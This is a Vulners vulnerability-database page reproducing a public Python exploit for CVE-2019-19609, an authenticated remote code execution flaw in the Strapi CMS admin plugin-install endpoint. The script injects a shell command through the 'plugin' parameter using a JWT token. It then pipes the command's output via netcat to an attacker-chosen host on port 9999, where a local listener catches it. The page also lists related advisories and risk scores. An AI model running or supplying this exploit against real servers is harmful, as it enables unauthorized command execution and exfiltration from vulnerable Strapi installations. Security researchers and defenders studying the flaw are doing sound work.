Vulners
Lucene search
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Strapi | 29 Aug 202116:18 | – | githubexploit |
| Exploit for OS Command Injection in Strapi | 11 Sep 202106:53 | – | githubexploit |
| Exploit for OS Command Injection in Strapi | 30 Aug 202103:05 | – | githubexploit |
| Exploit for OS Command Injection in Strapi | 29 Aug 202117:57 | – | githubexploit |
 | Strapi 3.0.0-beta.17.7 - Remote Code Execution (Authenticated) Exploit | 30 Aug 202100:00 | – | zdt |
| Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (Unauthenticated) Exploit | 30 Aug 202100:00 | – | zdt |
 | CVE-2019-19609 | 18 Jun 202210:22 | – | circl |
 | Strapi Admin Panel Install and Uninstall Plugin Component Remote Code Execution Vulnerability | 5 Dec 201900:00 | – | cnvd |
 | Strapi Remote Code Execution (CVE-2019-19609) | 10 Oct 202100:00 | – | checkpoint_advisories |
 | CVE-2019-19609 | 5 Dec 201919:44 | – | cve |
10
# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609
#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
import requests, sys, os, socket
logoType = ('''
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
''')
if __name__ == '__main__':
# Parameter checking
if len(sys.argv) != 5:
print(logoType)
print("[!] Some of these parameters are missing.")
print('''
Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])
# Exploit run
else:
# Paremeters
url = sys.argv[1]
token = sys.argv[2]
command = sys.argv[3]
lhost = sys.argv[4]
lport = 9999
s = requests.session()
r = s.post(url, verify=False) # SSL == verify=True
headersData = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Authorization': "Bearer %s" % token
}
postData = {
"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)
}
print(logoType)
os.system("nc -nvlp 9999 &")
try:
print("[+] Successful operation!!!")
r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True
# Content print
print(r.text)
except:
print("[!] An error occurred, try again.")
sys.exit(1)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Aug 2021 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.2
CVSS 29
EPSS0.81127